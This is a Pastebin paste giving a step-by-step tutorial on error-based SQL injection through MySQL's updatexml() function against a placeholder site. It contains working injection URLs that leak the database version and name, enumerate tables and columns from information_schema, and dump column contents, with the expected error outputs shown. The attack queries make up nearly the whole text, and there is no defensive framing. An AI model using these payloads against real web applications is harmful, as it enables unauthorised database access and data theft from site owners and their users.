API tools faq
paste
Advertisement
Kyfx

XPATH Injection Using UPDATEXML

Kyfx
Jul 25th, 2015
446
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.26 KB | None | 0 0
raw download clone embed print report
  1. Now Let's Start Our Injecting Manually.We are injecting A Site and Then we Execute our UNION BASED Query But we Do not Get Any OutPut There so We Will use There XPATH Injection.
  2. For Example here is our UNION BASED Query.
  3.  
  4. http://www.VulnSite.com/news.php?id=6 and 0 Union Select 1,2,3,4,5-- -
  5.  
  6. After Executing This Query we Do not Get any OUTPUT or Sometimes we Got This Type OF Error
  7. "The used SELECT statements have a different number of columns"
  8. so we will Use There XPATH Injection for injecting the DATABASE
  9. So let's try To Get The Version Using XPATH Injection With UPDATEXML query.
  10. our XPATH Query will be:
  11.  
  12. http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,version()),null)-- -
  13.  
  14. After Executing The Query we Got this Type of Output :
  15.  
  16. XPATH syntax error: ':VERSION_HERE'
  17.  
  18. So now Let's Check The Current Database Name and Our Query for Getting The Current Database Will be:
  19.  
  20. http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,database()),null)-- -
  21.  
  22. and we Got This Output:
  23. XPATH syntax error: ':CURRENT_DATABASE_NAME_HERE'
  24.  
  25. Now Let's Continue our Injecting to Getting The Tables in the Current Database.
  26. So This one Will be Our Query for the Tables:
  27.  
  28. http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),null)-- -
  29.  
  30. And After Executing The Query we Will Got This output:
  31.  
  32. XPATH syntax error: ':SOME_TABLE_NAME_HERE'
  33.  
  34. as we are injecting with XPATH injection so we will increase the LIMIT for getting other Tables in the current Database.
  35. So After Getting the Tables From the current Database Our Next Step is to get The COLUMNS From TABLES.
  36. And our Query for Getting Columns Will be:
  37.  
  38. http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(column_name) from information_schema.columns where table_name='OUR_TABLE_NAME_HERE' limit 0,1)),null)-- -
  39.  
  40. we will Increase the Limit for getting Other columns in the Targeted Table.
  41. So After Getting The columns FINAL PART is to dump Data from the columns.
  42. And Our FINAL Query will be :
  43. http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(OUR_COLUMN_NAME_HERE) from OUR_TABLE_NAME_HERE)),null)-- -
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!